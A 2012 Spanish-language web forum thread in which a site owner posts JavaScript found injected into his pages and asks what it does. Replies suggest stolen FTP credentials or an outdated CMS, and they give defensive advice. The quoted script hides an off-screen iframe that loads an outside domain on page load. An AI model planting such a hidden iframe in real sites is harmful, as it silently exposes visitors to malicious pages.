Robo de FTP?

jossss · #1 (**permalink**) 29/08/2012, 08:28

Hola recientemente he encontrado en mi web este código

Código Javascript:

Ver original<script type="text/javascript">
 
function frmAdd() {
 
var ifrm = document.createElement('iframe');
 
ifrm.style.position='absolute';
 
ifrm.style.top='-999em';
 
ifrm.style.left='-999em';
 
ifrm.src  = "http://clicksystemban.com/?1";
 
ifrm.id = 'frmId';
 
document.body.appendChild(ifrm);
 
};
 
window.onload = frmAdd;
 
</script>

Alguien sabe en que consiste? Por lo que veo introduce un iframe en la web. ¿motivo?
Yo supongo que esto se ha realizado robando las claves FTP, pero no estoy seguro.
Algún entendido que sepa algo del tema?
Muchas gracias de antemano.

JoshMex · #2 (**permalink**) 29/08/2012, 09:25

Si, es posible que algún spyware o malware robara los datos de tu cuenta que guardas en tu cliente ftp, regla de oro, no guardes tus password en los clientes ftp.
También puede ser que tengas un script vulnerable, si usas wordpress, joomla o similares actualízalos a las últimas versiones, igual para sus plugins.

Datacenter1 · #3 (**permalink**) 29/08/2012, 10:17

Complementando un poco más la buena información de JoshMex, utiliza siempre FTP encriptado (ssl o tls) esto minimizará los riesgos de que te roben las contraseñas FTP

Observa la hora y fecha en que fue modificado el archivo y busca en los logs de acceso y ftp para dar con la forma que usarón para inyectar el código y reparar la falla de seguridad

stormy · #4 (**permalink**) 29/08/2012, 14:07

Si tienes instalado cualquier CMS como Wordpress, Joomla, etc., y no lo tienes actualizado, es más habitual que la puerta de entrada sea esa que un robo de claves FTP.

WebTech · #5 (**permalink**) 30/08/2012, 07:30

Muchas veces hay malware directamente en la PC, o a través de software pirata, esto ultimamente es la causa del 90% de las infecciones que hemos visto. Además de mantener los scripts actualizados siempre es bueno usar FTPS o bien directamente ecapsular FTP sobre SSH2 (SFTP), algo que hoy en día casi cualquier cliente de FTP soporta.

Un saludo,

Xondriz · #6 (**permalink**) 30/08/2012, 21:42

Correcto muchas veces puede ser tu pc infectada por malware o virus, tambien que hayas subido a tu ftp algun script encontrado en el internet sin haber revisado el codigo es el gran error de varios, ahora hay que tener cuidado con las actualizaciones de script como jooma, wordpress ya que estan siendo vulnerados si no metes las medidas de seguridad adecuadas.

Saludos.

infracom2005 · #7 (**permalink**) 31/08/2012, 00:59

Seguramente un malware en tu pc, un script desactualizado o una contraseña insegura.

loadinges · #8 (**permalink**) 31/08/2012, 06:45

Es muy común que se pueda colar un espía en tu pc y te robe los datos FTP y los utilice para hackear tu web.

Como recomiendan por aquí:

- Pasar un antimalware (por ejemplo Malwarebytes, que funciona muy bien en su versión gratuita )
- Cambiar todas las contraseñas que sospeches que te haya podido robar.
- Actualizar la aplicación web que tengas instalada.

Saludos.